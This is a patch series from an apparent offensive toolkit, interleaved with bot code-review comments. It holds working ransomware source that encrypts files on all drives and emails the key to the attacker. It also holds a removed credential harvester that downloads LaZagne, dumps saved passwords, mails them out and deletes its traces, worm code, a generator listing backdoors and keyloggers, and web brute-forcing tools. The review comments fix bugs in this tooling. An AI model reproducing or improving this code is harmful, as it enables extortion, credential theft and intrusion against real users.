+class DMSecEncrypter:
+ def __init__(self, paths: list = None, email: str = None, passwd: str = None, smtp_server: str = 'smtp.gmail.com', smtp_port: int = 587) -> None:
 # generate new key
 self.KEY = Fernet.generate_key()
+ message = f'Subject: RNSMWARE ATTK has been initialized on {environ.get("COMPUTERNAME", None)}\n**KEY** {str(self.KEY, encoding="utf-8")}\n**OS** {environ.get("OS", None)}\n\n'
 # report KEY to the attacker using email
- if gmail!=None and passwd!=None and self.send_mail(mail=gmail, password=passwd):
+ if email != None and passwd != None and send_mail(email=email, password=passwd, receiver_mail=email, smtp_server=smtp_server, smtp_port=smtp_port):
 pass
 else:
 # print error message and exit if key is not sent
@@ -26,23 +27,6 @@ def __init__(self, paths:list=None, gmail:str=None, passwd:str=None) -> None:
 else:
 self.PATHS = paths
-
- def send_mail(self, mail, password)->bool:
- '''
- sends mail to specific address/addresses.
- '''
- try:
- message = f'Subject: RNSMWARE ATTK has been initialized on {environ["COMPUTERNAME"]}\n**KEY** {str(self.KEY, encoding="utf-8")}\n**OS** {environ["OS"]}\n\n'
- server = smtplib.SMTP('smtp.gmail.com', 587)
- server.starttls()
- server.login(mail, password)
- server.sendmail(mail, mail, message)
- server.quit()
- return True
- except Exception as e:
- return False
-
-
 def __get_partitions_path(self) -> list:
 '''
 returns all mounted partition's mount points as a list
@@ -52,7 +36,6 @@ def __get_partitions_path(self) -> list:
 mount_points.append(partition.mountpoint)
 return mount_points
-
 def encrypt_file(self, file_path):
 try:
 # read file data
@@ -69,28 +52,13 @@ def encrypt_file(self, file_path):
 except Exception:
 return False
-
-
-
- def encrypt_files(self, path:str):
+
+ def encrypt_files(self, path: str):
 for root, dirs, files in walk(path):
 for file in files:
 file_path = join(root, file)
 self.encrypt_file(file_path=file_path)
-
 def start(self):
 for path in self.PATHS:
 self.encrypt_files(path)
-
-
-if __name__ == '__main__':
- # Print some meaningful text, so that user don't suspect program as ransomeware
- print('[*] Loading...')
-
- # Specify paths to be encrypted
- PATHS = [r'path_to_be_encrypted',]
-
- # don't pass PATHS if all the drives are to be encrypted
- encrypter = DMSECEncrypter(PATHS, gmail='yourgmailid', passwd='yourapppassword')
- encrypter.start()
- print('[*] Completed')
diff --git a/pyhtools/malwares/wireless_password_harvester/__init__.py b/pyhtools/evil_files/worms/__init__.py
similarity index 100%
rename from pyhtools/malwares/wireless_password_harvester/__init__.py
rename to pyhtools/evil_files/worms/__init__.py
diff --git a/pyhtools/worms/dir_cloner.py b/pyhtools/evil_files/worms/dir_cloner.py
similarity index 89%
rename from pyhtools/worms/dir_cloner.py
rename to pyhtools/evil_files/worms/dir_cloner.py
index f791ed0..8952daf 100644
--- a/pyhtools/worms/dir_cloner.py
+++ b/pyhtools/evil_files/worms/dir_cloner.py
@@ -134,21 +134,4 @@ def clone_dir(self, times:int=1000, start_after:int=0, src:str=None, dst:str=Non
 time.sleep(start_after)
 for iteration in range(times):
 threading.Thread(target=self.clone, args=(iteration, src, dst)).start()
-
-
-if __name__=='__main__':
- dir_worm = DirCloner()
- path = dir_worm.get_curr_drive_folder()
-
- if dir_worm.set_clone_path(path):
- # print(f"[*] Clone path : {path}")
- pass
- else:
- # print(f"[!] Failed to set new clone path {path}")
- pass
-
- # for specific folder
- dir_worm.clone_dir(times=1, start_after=0)
-
- # for specific folder and its subfolder
- dir_worm.clone_all_dirs(times=1, start_after=0, path=path)
\ No newline at end of file
+
\ No newline at end of file
diff --git a/pyhtools/executable_generator/generator.py b/pyhtools/executable_generator/generator.py
new file mode 100644
index 0000000..b2a31c2
--- /dev/null
+++ b/pyhtools/executable_generator/generator.py
@@ -0,0 +1,50 @@
+'''
+module: generator.py
+description: generates evil files using specified payload and type
+'''
+from enum import Enum
+# from subprocess import check_call, check_output
+
+
+# TODO: convert all evil files modules into classes
+# create new class object with parameters and generate
+# evil file using specified compiler using subprocess
+
+
+class CompileOptions(Enum):
+ PYINTALLER = 0
+ NUITKA = 1
+
+
+class Generator:
+ def __init__(self, _type: str, payload: str, compiler: CompileOptions = CompileOptions.PYINTALLER, *args, **kwargs) -> None:
+ self.__type = _type
+ self.__payload = payload
+ self.__compiler = compiler
+
+ self.__options = {
+ 'malwares': [
+ 'credential_harvester',
+ 'keylogger',
+ 'http_reverse_backdoor',
+ 'tcp_reverse_backdoor',
+ 'telegram_data_harvester',
+ 'telegram_remote_code_executor',
+ 'wireless_password_harvester'
+ ],
+ 'ransomwares': [
+ 'dmsec',
+ ],
+ 'worms': [
+ 'dir_cloner'
+ ],
+ }
+
+ def verify():
+ pass
+
+ def show_options():
+ pass
+
+ def generate_file():
+ pass
diff --git a/pyhtools/executable_generator/utils.py b/pyhtools/executable_generator/utils.py
deleted file mode 100644
index e060667..0000000
--- a/pyhtools/executable_generator/utils.py
+++ /dev/null
@@ -1,2 +0,0 @@
-from pyhtools.UI.colors import *
-
diff --git a/pyhtools/malwares/credential_harvester/credential_harvester.py b/pyhtools/malwares/credential_harvester/credential_harvester.py
deleted file mode 100644
index cf63495..0000000
--- a/pyhtools/malwares/credential_harvester/credential_harvester.py
+++ /dev/null
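Review bot: `verify`, `show_options` and `generate_file` on `Generator` are declared without `self`, so calling any of them on an instance raises `TypeError` (the bound instance is passed to a zero-argument function); as instance methods they should read `def verify(self):`, `def show_options(self):`, `def generate_file(self):`, or carry `@staticmethod` if they are meant not to touch the instance. The `CompileOptions.PYINTALLER` member is misspelled (`PYINSTALLER`) and is already used as the default in `Generator.__init__`, so correcting it means changing both places. `*args, **kwargs` in `__init__` are accepted and silently discarded; either document what they are reserved for in the module docstring or drop them so a misspelled keyword fails loudly.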
@@ -1,72 +0,0 @@ -#!usr/bin/env python -import smtplib, requests, os, tempfile, subprocess, zipfile -import malwares.send_mail.send_mail as mail - -def send_mail(mail, password, message)->bool: - ''' - description: sends mail to self using gmail smtp. - params: mail, password, message - returns: bool - ''' - try: - server = smtplib.SMTP('smtp.gmail.com', 587) - server.starttls() - server.login(mail, password) - server.sendmail(mail, mail, message) - server.quit() - return True - except smtplib.SMTPException as e: - print('[-] Exception : ', e) - return False - - -def download(url:str)->bool: - ''' - description: downloads file from the url. - params: url - returns: bool - ''' - try: - response = requests.get(url) - file_name = url.split('/')[-1] - with open(file_name, 'wb') as dfile: - dfile.write(response.content) - return True - except Exception as e: - print('[-] Exception : ', e) - return False - - -def run(email, password): - ''' - starts collecting data and report to specified email. - ''' - tmp_dir = tempfile.gettempdir() - os.chdir(tmp_dir) - # download LaZagne - download(r'https://github.com/AlessandroZ/LaZagne/releases/download/2.3.2/Windows.zip') - with zipfile.ZipFile('Windows.zip', 'r') as zip_file: - zip_file.extractall(tmp_dir) - - os.chdir('Windows') - recovered_report = subprocess.call('laZagne_x86.exe all') - print(recovered_report) - - report = subprocess.check_output('lazagne.exe all -vv') - msg = 'Subject: Credential Harvester Report.\n' + report - mail.send_mail_to(email, email, password, msg) - - # remove traces - cwd = os.getcwd() - for file in os.listdir(cwd): - file_dir = os.path.join(cwd,file) - os.remove(file_dir) - - os.chdir('..') - os.rmdir('Windows') - os.remove('Windows.zip') - - -if __name__ == '__main__': - run('youremail@gmail.com', 'yourpassword') - \ No newline at end of file diff --git a/pyhtools/malwares/downloader/downloader.py b/pyhtools/malwares/downloader/downloader.py deleted file mode 100644 index f1f29b2..0000000 
--- a/pyhtools/malwares/downloader/downloader.py +++ /dev/null @@ -1,18 +0,0 @@ -import requests - -def download(url:str)->bool: - ''' - description: download and save file from the url. - params: url - returns: bool - ''' - try: - response = requests.get(url) - file_name = url.split('/')[-1] - with open(file_name, 'wb') as file: - file.write(response.content) - return True - - except Exception as e: - print('[-] Exception : ', e) - return False diff --git a/pyhtools/malwares/send_mail/how to.txt b/pyhtools/malwares/send_mail/how to.txt deleted file mode 100644 index 801d5d9..0000000 --- a/pyhtools/malwares/send_mail/how to.txt +++ /dev/null @@ -1,6 +0,0 @@ -refer this video tutorial: https://www.youtube.com/watch?v=ql5Dex4m40w - -Steps: -1. Turn on 2FA -2. Go to GoogleAcc->Security->AppPassword->Custom -3. Copy generated key and use that as password \ No newline at end of file diff --git a/pyhtools/malwares/send_mail/send_mail.py b/pyhtools/malwares/send_mail/send_mail.py deleted file mode 100644 index ea6915f..0000000 --- a/pyhtools/malwares/send_mail/send_mail.py +++ /dev/null @@ -1,33 +0,0 @@ -import smtplib - - -def send_mail_to(mail, receiver_mail: str , password, message)->bool: - ''' - sends mail to specific address/addresses. - ''' - try: - server = smtplib.SMTP('smtp.gmail.com', 587) - server.starttls() - server.login(mail, password) - server.sendmail(mail, receiver_mail, message) - server.quit() - return True - except smtplib.SMTPException as e: - print('[-] Exception : ', e) - return False - - -if __name__=='__main__': - msg = '''Subject: This is a test mail - Dear User, - This is a test message. - ''' - gmail = 'your@gmail.com' - password = 'password' - receivers = 'list of emails' - - # mail to self - send_mail_to(gmail, gmail, password, msg) - - # mail to others - send_mail_to(gmail, receivers, password, msg) 
diff --git a/pyhtools/malwares/wireless_password_harvester/HowToUse.txt b/pyhtools/malwares/wireless_password_harvester/HowToUse.txt deleted file mode 100644 index aecc52f..0000000 --- a/pyhtools/malwares/wireless_password_harvester/HowToUse.txt +++ /dev/null @@ -1,4 +0,0 @@ -HOW to use: -1. Update email id and password -2. Turn on less secure app: https://myaccount.google.com/lesssecureapps -3. Create exe: pyinstaller.exe --onefile --icon='icon_path' -n 'name_of_file' .\wireless_profile_harvestor.py \ No newline at end of file diff --git a/pyhtools/ransomwares/__init__.py b/pyhtools/ransomwares/__init__.py deleted file mode 100644 index e69de29..0000000 diff --git a/pyhtools/ransomwares/dmsec/__init__.py b/pyhtools/ransomwares/dmsec/__init__.py deleted file mode 100644 index e69de29..0000000 diff --git a/pyhtools/worms/__init__.py b/pyhtools/worms/__init__.py deleted file mode 100644 index e69de29..0000000 From cb5859c54e0196738db1a8c6c8afd3ca38da7f40 Mon Sep 17 00:00:00 2001 
From: Dhrumil Mistry <56185972+dmdhrumilmistry@users.noreply.github.com> Date: Mon, 13 Jun 2022 18:18:33 +0530 Subject: [PATCH 3/5] use threads to discover dirs, files and subdomains rename websites to web rename Network to network --- pyhtools/attackers/Websites/crawler.py | 140 --------------- pyhtools/attackers/attackers.py | 32 ++-- .../attackers/{Websites => web}/__init__.py | 0 .../attackers/{Websites => web}/get_forms.py | 0 .../{Websites => web}/login_guesser.py | 0 .../attackers/{Websites => web}/spider.py | 0 .../{Websites => web}/vuln_scanner/README.md | 0 .../vuln_scanner/__init__.py | 0 .../{Websites => web}/vuln_scanner/scanner.py | 0 .../{Websites => web}/vuln_scanner/sqli.py | 0 .../{Websites => web}/vuln_scanner/test.txt | 0 .../vuln_scanner/vuln_scanner.py | 0 pyhtools/attackers/web/webdiscover.py | 161 ++++++++++++++++++ 13 files changed, 174 insertions(+), 159 deletions(-) delete mode 100644 pyhtools/attackers/Websites/crawler.py rename pyhtools/attackers/{Websites => web}/__init__.py (100%) rename pyhtools/attackers/{Websites => web}/get_forms.py (100%) rename pyhtools/attackers/{Websites => web}/login_guesser.py (100%) rename pyhtools/attackers/{Websites => web}/spider.py (100%) rename pyhtools/attackers/{Websites => web}/vuln_scanner/README.md (100%) rename pyhtools/attackers/{Websites => web}/vuln_scanner/__init__.py (100%) rename pyhtools/attackers/{Websites => web}/vuln_scanner/scanner.py (100%) rename pyhtools/attackers/{Websites => web}/vuln_scanner/sqli.py (100%) rename pyhtools/attackers/{Websites => web}/vuln_scanner/test.txt (100%) rename pyhtools/attackers/{Websites => web}/vuln_scanner/vuln_scanner.py (100%) create mode 100644 pyhtools/attackers/web/webdiscover.py diff --git a/pyhtools/attackers/Websites/crawler.py b/pyhtools/attackers/Websites/crawler.py deleted file mode 100644 index ee5ed79..0000000 --- a/pyhtools/attackers/Websites/crawler.py +++ /dev/null 
@@ -1,140 +0,0 @@ -import requests -import os -import argparse -import sys -from pyhtools.UI.colors import * - - -def get_args()->dict: - ''' - description: creates a ArgumentParser object collects - arguments and returns arguments as a dict - params: None - returns: dict - ''' - parser = argparse.ArgumentParser() - parser.add_argument('-t', '--target-domain', dest='target_domain', help='domain of your target eg. google.com, bing.com, facebook.com, etc.') - parser.add_argument('-w', '--wordlist', dest='wordlist', help='path to wordlist') - parser.add_argument('-m','--mode', dest='mode', help='modes : subdomain(find subdomains of the target domain), dirs(find directories of the target domain), subdir (find subdomain and directories of the target domain).') - - args = parser.parse_args() - del parser - - args_dict = { - 'mode' : args.mode, - 'wordlist' : args.wordlist, - 'target_domain':args.target_domain - } - - return args_dict - - -def request(url)->bool: - ''' - description: requests for specific url and - returns true if url is valid. - params : url(str) - returns : bool - ''' - try: - response = requests.get(url, timeout=0.5) - # print(url) - # print(response) - if response.status_code == 200: - return True - return False - except requests.exceptions.ConnectionError: - return False - except UnicodeError: - return False - except Exception as e: - print(BRIGHT_RED + '[-] Request Exception : ', e) - return False - - -def check_subdomain(domain:str, subdomain:str)->bool: - ''' - description: checks if subdomain exists under domain. - prints generated url and returns True if url is valid - params: subdomain(str), domain(str) - returns: bool - ''' - url = f'http://{subdomain}.{domain}' - # print(url) - if request(url): - print('[*] Valid Subdomain : ', url) - return True - else: - return False - - -def check_directories(domain:str, dir_name:str)->bool: - ''' - description: checks for directory for domain. - prints url and returns True if generated url is valid. 
- params: domain(str), dir_name(str) - returns : bool - ''' - url = f'http://{domain}/{dir_name}' - - if request(url): - print('[*] Valid Directory : ', url) - return True - else: - return False - - -def perform_function(func, wordlist:str, domain:str)->bool: - ''' - description: performs specific function on passed keyword arguements - params: func(function), **kwargs(keyword arguments) - returns: bool - ''' - try: - print(BRIGHT_WHITE + '[*] Loading wordlists...') - - print('='*25) - if os.path.isfile(wordlist): - with open(wordlist, 'r') as wordlist_file: - for word in wordlist_file: - word = word.strip() - # print(word) - func(domain, word) - else: - print(BRIGHT_RED + '[-] Wordlist Not Found.') - print('='*25) - print(BRIGHT_YELLOW + '[*] Process Completed.') - - except Exception as e: - print(BRIGHT_RED + '[-] Perform Exception : ', e) - print(BRIGHT_RED + '[!] Process Interrupted!') - - -# ========== Main =============== -if __name__ == '__main__': - print(BRIGHT_YELLOW + '[*] Starting crawler...') - - args = get_args() - # print(args) - - wordlist_file = r'{}'.format(args['wordlist']) - target_domain = args['target_domain'] - - try: - if args['mode'] == 'subdomain': - print(BRIGHT_YELLOW + '[1] Finding subdomains') - perform_function(check_subdomain, wordlist_file, target_domain) - elif args['mode'] == 'dirs': - print(BRIGHT_YELLOW + '[2] Finding directories and files') - perform_function(check_directories, wordlist_file, target_domain) - elif args['mode'] == 'subdirs': - print(BRIGHT_YELLOW + '[1] Finding subdomains') - perform_function(check_subdomain, wordlist_file, target_domain) - - print(BRIGHT_YELLOW + '[2] Finding directories and files') - perform_function(check_directories, wordlist_file, target_domain) - else: - print(BRIGHT_RED + '[-] Unkown mode: use --help or -h for help') - except KeyboardInterrupt: - print('[!] ctrl+c detected! Exiting Program..') - sys.exit() \ No newline at end of file 
diff --git a/pyhtools/attackers/attackers.py b/pyhtools/attackers/attackers.py index a58b9fd..a04c760 100644 --- a/pyhtools/attackers/attackers.py +++ b/pyhtools/attackers/attackers.py @@ -1,13 +1,13 @@ import json -import pyhtools.attackers.Network.arpspoofer as arp -import pyhtools.attackers.Network.nwscan as nwscan -import pyhtools.attackers.Network.machngr as machngr -import pyhtools.attackers.Websites.login_guesser as web_login -import pyhtools.attackers.Websites.spider as spider -import pyhtools.attackers.Websites.crawler as crawler +import pyhtools.attackers.network.arpspoofer as arp +import pyhtools.attackers.network.nwscan as nwscan +import pyhtools.attackers.network.machngr as machngr +import pyhtools.attackers.web.login_guesser as web_login +import pyhtools.attackers.web.spider as spider from pyhtools.UI.colors import * -from pyhtools.attackers.Websites.vuln_scanner.scanner import Scanner +from pyhtools.attackers.web.vuln_scanner.scanner import Scanner +from pyhtools.attackers.web.webdiscover import Discoverer # NETWORK ATTACKS @@ -34,7 +34,7 @@ def nw_scan(): params: None returns: None ''' - ip_range = input('[+] IP RANGE : ') + ip_range = input('[+] IP (192.168.10.1/24): ') nwscan.run_nwscan(ip_range) @@ -123,10 +123,9 @@ def webcrawldirs(): params: None returns: None ''' - target_url = input('[+] TARGET URL : ') - wordlist_path = input('[+] WORDLIST PATH : ') - crawler.perform_function(crawler.check_directories, - wordlist_path, target_url) + domain = input('[+] DOMAIN (duckduckgo.com): ') + wordlist_path = input('[+] WORDLIST PATH: ') + Discoverer.check_dirs(domain=domain, wordlist=wordlist_path) def webcrawlsubdom(): 
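Review bot: The return value of `Discoverer.check_dirs` is dropped in `webcrawldirs`, and `__perform_function` in webdiscover.py (same series) returns False without printing anything when the wordlist path is not a file, so a mistyped path now ends the menu action silently where the replaced `crawler.perform_function` printed `[-] Wordlist Not Found.`. Checking the result restores that feedback: `if not Discoverer.check_dirs(domain=domain, wordlist=wordlist_path):` followed by `print(f'{BRIGHT_RED}[-] Wordlist Not Found.')`. The same applies to `check_subdomains` in the `webcrawlsubdom` hunk that follows. `webcrawldirs` starts before this hunk.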
@@ -135,11 +134,6 @@ def webcrawlsubdom(): params: None returns: None ''' - target_url = input('[+] TARGET URL : ') + domain = input('[+] DOMAIN (duckduckgo.com) : ') wordlist_path = input('[+] WORDLIST PATH : ') - crawler.perform_function(crawler.check_subdomain, - wordlist_path, target_url) - - -if __name__ == "__main__": - print('[*] Attackers module!. Exiting...') + Discoverer.check_subdomains(domain=domain, wordlist=wordlist_path) diff --git a/pyhtools/attackers/Websites/__init__.py b/pyhtools/attackers/web/__init__.py similarity index 100% rename from pyhtools/attackers/Websites/__init__.py rename to pyhtools/attackers/web/__init__.py diff --git a/pyhtools/attackers/Websites/get_forms.py b/pyhtools/attackers/web/get_forms.py similarity index 100% rename from pyhtools/attackers/Websites/get_forms.py rename to pyhtools/attackers/web/get_forms.py diff --git a/pyhtools/attackers/Websites/login_guesser.py b/pyhtools/attackers/web/login_guesser.py similarity index 100% rename from pyhtools/attackers/Websites/login_guesser.py rename to pyhtools/attackers/web/login_guesser.py diff --git a/pyhtools/attackers/Websites/spider.py b/pyhtools/attackers/web/spider.py similarity index 100% rename from pyhtools/attackers/Websites/spider.py rename to pyhtools/attackers/web/spider.py diff --git a/pyhtools/attackers/Websites/vuln_scanner/README.md b/pyhtools/attackers/web/vuln_scanner/README.md similarity index 100% rename from pyhtools/attackers/Websites/vuln_scanner/README.md rename to pyhtools/attackers/web/vuln_scanner/README.md diff --git a/pyhtools/attackers/Websites/vuln_scanner/__init__.py b/pyhtools/attackers/web/vuln_scanner/__init__.py similarity index 100% rename from pyhtools/attackers/Websites/vuln_scanner/__init__.py rename to pyhtools/attackers/web/vuln_scanner/__init__.py 
diff --git a/pyhtools/attackers/Websites/vuln_scanner/scanner.py b/pyhtools/attackers/web/vuln_scanner/scanner.py similarity index 100% rename from pyhtools/attackers/Websites/vuln_scanner/scanner.py rename to pyhtools/attackers/web/vuln_scanner/scanner.py diff --git a/pyhtools/attackers/Websites/vuln_scanner/sqli.py b/pyhtools/attackers/web/vuln_scanner/sqli.py similarity index 100% rename from pyhtools/attackers/Websites/vuln_scanner/sqli.py rename to pyhtools/attackers/web/vuln_scanner/sqli.py diff --git a/pyhtools/attackers/Websites/vuln_scanner/test.txt b/pyhtools/attackers/web/vuln_scanner/test.txt similarity index 100% rename from pyhtools/attackers/Websites/vuln_scanner/test.txt rename to pyhtools/attackers/web/vuln_scanner/test.txt diff --git a/pyhtools/attackers/Websites/vuln_scanner/vuln_scanner.py b/pyhtools/attackers/web/vuln_scanner/vuln_scanner.py similarity index 100% rename from pyhtools/attackers/Websites/vuln_scanner/vuln_scanner.py rename to pyhtools/attackers/web/vuln_scanner/vuln_scanner.py diff --git a/pyhtools/attackers/web/webdiscover.py b/pyhtools/attackers/web/webdiscover.py new file mode 100644 index 0000000..86b2d33 --- /dev/null +++ b/pyhtools/attackers/web/webdiscover.py 
@@ -0,0 +1,161 @@ +import argparse +import os +import sys +import requests + + +from pyhtools.UI.colors import * +from threading import Thread + + +class Discoverer: + ''' + helps to discover directories, files and subdomains + ''' + @staticmethod + def request(url, valid_status_codes: list[int] = None) -> bool: + ''' + description: requests for specific url and + returns true if url is valid. + params : url(str), status_codes list[int] + returns : bool + ''' + if not valid_status_codes: + status_codes = [200, 204, 301, 302, 307, 401] + + try: + response = requests.get(url, timeout=0.5) + if response.status_code in status_codes: + return True + return False + except Exception as e: + # print(f'{BRIGHT_RED}[-] Request Exception: {e}') + return False + + @staticmethod + def __check_subdomain(domain: str, subdomain: str) -> bool: + ''' + description: checks if subdomain exists under domain. + prints generated url and returns True if url is valid + params: subdomain(str), domain(str) + returns: bool + ''' + url = f'http://{subdomain}.{domain}' + + if Discoverer.request(url): + print(f'[\u2713] {url}') + return True + else: + return False + + @staticmethod + def __check_directory(domain: str, dir_name: str) -> bool: + ''' + description: checks for directory for domain. + prints url and returns True if generated url is valid. 
+ params: domain(str), dir_name(str) + returns : bool + ''' + url = f'http://{domain}/{dir_name}' + if Discoverer.request(url): + print(f'[\u2713] {url}') + return True + else: + return False + + @staticmethod + def check_dirs(domain: str, wordlist: str, ): + return Discoverer.__perform_function( + func=Discoverer.__check_directory, + wordlist=wordlist, + domain=domain + ) + + @staticmethod + def check_subdomains(domain: str, wordlist: str): + return Discoverer.__perform_function( + func=Discoverer.__check_subdomain, + wordlist=wordlist, + domain=domain + ) + + @staticmethod + def __perform_function(func, wordlist: str, domain: str, threads: int = 5) -> bool: + ''' + description: performs specific function on passed keyword arguements + params: func(function), **kwargs(keyword arguments) + returns: bool + ''' + # if file does not exists return False + if not os.path.isfile(wordlist): + return False + + # load wordlists into a list + words = [''] + with open(wordlist, 'r') as wordlist_file: + words = wordlist_file.readlines() + + # sanitize list + words = [word.strip() for word in words] + + # function to manage thread + def manage_thread(): + while len(words) != 0: + word = words[0] + func(domain, word) + words.pop(0) + + # create threads list + threads_list:list[Thread] = [] + + for _ in range(threads): + thread = Thread(target=manage_thread) + threads_list.append(thread) + + # start threads + for thread in threads_list: + thread.start() + + # stop threads + for thread in threads_list: + thread.join() + + return True + + +if __name__ == '__main__': + + parser = argparse.ArgumentParser(prog='webdiscover') + parser.add_argument('-t', '--target-domain', dest='target_domain', + help='domain of your target eg. 
google.com, bing.com, facebook.com, etc.', required=True) + parser.add_argument('-w', '--wordlist', dest='wordlist', + help='path to wordlist', required=True) + parser.add_argument('-m', '--mode', dest='mode', + help='modes : subdom(find subdomains of the target domain), dir(find directories of the target domain). default mode is `dir`', default='dir') + + args = parser.parse_args() + target_domain = args.target_domain + wordlist_file = args.wordlist + mode = args.mode + + try: + if mode == 'subdom': + print(f'{BRIGHT_YELLOW}[1] Finding subdomains') + Discoverer.check_subdomains( + domain=target_domain, + wordlist=wordlist_file + ) + + elif mode == 'dir': + print(f'{BRIGHT_YELLOW}[2] Finding directories and files') + Discoverer.check_dirs( + domain=target_domain, + wordlist=wordlist_file, + ) + + else: + print(f'{BRIGHT_RED}[!] invalid mode. Use -h tag to print help.') + + except KeyboardInterrupt or EOFError: + print('[!] User Interrupted!') + sys.exit() From 9c88f425cc8c2409773559ee3994e0848e51e964 Mon Sep 17 00:00:00 2001 From: Dhrumil Mistry <56185972+dmdhrumilmistry@users.noreply.github.com> Date: Mon, 13 Jun 2022 21:29:42 +0530 Subject: [PATCH 4/5] update spider module --- pyhtools/attackers/attackers.py | 11 ++++- pyhtools/attackers/web/spider.py | 69 ++++++++++++++++---------------- 2 files changed, 43 insertions(+), 37 deletions(-) diff --git a/pyhtools/attackers/attackers.py b/pyhtools/attackers/attackers.py index a04c760..51a0581 100644 --- a/pyhtools/attackers/attackers.py +++ b/pyhtools/attackers/attackers.py @@ -3,10 +3,10 @@ import pyhtools.attackers.network.nwscan as nwscan import pyhtools.attackers.network.machngr as machngr import pyhtools.attackers.web.login_guesser as web_login -import pyhtools.attackers.web.spider as spider from pyhtools.UI.colors import * from pyhtools.attackers.web.vuln_scanner.scanner import Scanner +from pyhtools.attackers.web.spider import Spider from pyhtools.attackers.web.webdiscover import Discoverer 
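Review bot: The worker `manage_thread` in `__perform_function` reads `words[0]`, calls `func`, and only then pops, so with the default five threads the same word is requested by several workers at once, and the `words[0]` read raises IndexError (ending that thread with a traceback) when another worker empties the list between the `len` check and the index. Taking the word off the list before using it gives each word exactly one owner; see the rewritten worker below. In `request`, `status_codes` is only bound when `valid_status_codes` is falsy, so passing an explicit list raises UnboundLocalError that the broad `except Exception` turns into a silent False — `status_codes = valid_status_codes or [200, 204, 301, 302, 307, 401]` fixes it. `except KeyboardInterrupt or EOFError` evaluates to `except KeyboardInterrupt` alone; write `except (KeyboardInterrupt, EOFError):`.
```python
        # function to manage thread
        def manage_thread():
            while True:
                try:
                    word = words.pop(0)  # pop first: one owner per word
                except IndexError:
                    return  # list drained by another worker
                func(domain, word)
        # … unchanged: thread creation, start and join …
```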
@@ -114,7 +114,14 @@ def webspider(): returns: None ''' target_url = input('[+] TARGET URL : ') - spider.start_spider(target_url) + spider = Spider() + + print(f'{BRIGHT_YELLOW}[*] Starting Spider... Press Ctrl+C to interrupt') + discovered_links = spider.start( + target_url=target_url, + print_links=True + ) + print(f'[*] Total Links Found: {len(discovered_links)}') def webcrawldirs(): diff --git a/pyhtools/attackers/web/spider.py b/pyhtools/attackers/web/spider.py index 0f63ed3..f23ef7a 100644 --- a/pyhtools/attackers/web/spider.py +++ b/pyhtools/attackers/web/spider.py @@ -1,22 +1,18 @@ -#!usr/bin/env python3 -from os import name import requests import re -from urllib.parse import urljoin import argparse -from pyhtools.UI.colors import * +from urllib.parse import urljoin +from pyhtools.UI.colors import * -# list to save links on the whole webpage -# to avoid repetition -target_links = [] -def start_spider(target_url): - ''' - description: starts spider - ''' +class Spider: + def __init__(self) -> None: + # list to save links on the whole webpage + # to avoid repetition + self.target_links = [] - def get_links(url:str)->list: + def get_links(self, url: str) -> list: ''' description: extracts links from the whole webpage. params: url(str) of the webpage 
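Review bot: The new prompt in `webspider` says "Press Ctrl+C to interrupt", but `Spider.start` (spider.py, later in this series) has its try/except commented out, so unless a caller outside this file catches it, an interrupt propagates out of `spider.start(...)` as a traceback and the `Total Links Found` line is never printed, whereas the replaced `start_spider` caught KeyboardInterrupt and still reported the count. Catching it here and falling back to `spider.target_links` keeps the advertised behaviour; see below. `webspider` starts before this hunk.
```python
    target_url = input('[+] TARGET URL : ')
    spider = Spider()

    print(f'{BRIGHT_YELLOW}[*] Starting Spider... Press Ctrl+C to interrupt')
    try:
        discovered_links = spider.start(
            target_url=target_url,
            print_links=True
        )
    except KeyboardInterrupt:
        print(f'{BRIGHT_YELLOW}\r[!] ctrl+c detected! Exiting Spider.')
        discovered_links = spider.target_links  # links gathered so far
    print(f'[*] Total Links Found: {len(discovered_links)}')
```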
@@ -24,49 +20,52 @@ def get_links(url:str)->list: ''' response = requests.get(url) content = str(response.content) - return re.findall(r'(?:href=")(.*?)"',content) - + return re.findall(r'(?:href=")(.*?)"', content) - def get_target_links(url:str): + def get_target_links(self, url: str, print_link: bool = True): ''' description: extracts useful links and prints them which are only related to the target webpage. params: links(list) from the target webpage returns: useful links(list) related to target webpage ''' - global target_links - links = get_links(url) + target_links = self.target_links + links = self.get_links(url) + for link in links: link = urljoin(url, link) if '#' in link: link = link.split('#')[0] - # print(BRIGHT_RED+ link) - if link not in target_links and target_url in link: + if link not in target_links and url in link: target_links.append(link) - print(link) - get_target_links(link) + if print_link: + print(link) + self.get_target_links(url=link, print_link=print_link) + + def start(self, target_url:str, print_links: bool = True): + ''' + description: starts spider + ''' + # try: + self.get_target_links(target_url, print_links) + + # except Exception as e: + # print(f'{BRIGHT_RED}[!] Exception: {e}') - try: - print(BRIGHT_YELLOW + '[*] Starting SPIDER...') - get_target_links(target_url) - print(BRIGHT_YELLOW + f'[*] Mapped all links found on {target_url}') - print(BRIGHT_YELLOW + "[*] Total Links Found : ", len(target_links)) - except KeyboardInterrupt: - print(BRIGHT_YELLOW + '\r[!] ctrl+c detected! 
Exiting Spider.') - except Exception as e: - print(BRIGHT_RED + '[-] Exception : ', e) - finally: - print(BRIGHT_YELLOW + "[*] Total Links Found Before Exception : ", len(target_links)) + # finally: + return self.target_links if __name__ == '__main__': # Parse arguments parser = argparse.ArgumentParser() - parser.add_argument('-t', '--target', dest='target_url', help='url of the target eg: https://facebook.com, https://github.com, http://bing.com') + parser.add_argument('-t', '--target', dest='target_url', required=True, + help='url of the target eg: https://facebook.com, https://github.com, http://bing.com') args = parser.parse_args() - del parser target_url = args.target_url - start_spider(target_url) \ No newline at end of file + spider = Spider() + discovered_links = spider.start(target_url=target_url, print_links=True) + print(f'[*] Total Links Found: {len(discovered_links)}') From f3c41e1895a3f40b60d3ffc053550757ad8bb178 Mon Sep 17 00:00:00 2001 
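Review bot: The membership test in `get_target_links` changed from `target_url in link` to `url in link`, and because the method recurses with `url=link`, each page now only keeps links that contain that page's own URL as a substring — from `https://example.com/a/` a link to `https://example.com/b` is discarded (constructed example), so the crawl no longer maps the whole target. Keep the root on the instance instead: set `self.target_url = target_url` at the top of `start` and test `if link not in target_links and self.target_url in link:`. The commented-out try/except in `start` also removes the old KeyboardInterrupt handling, so `start` no longer returns the partial list on Ctrl+C; either restore the handler or document in its docstring that callers must catch it. Recursion depth is unbounded here as before, so a large site can still end in RecursionError.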
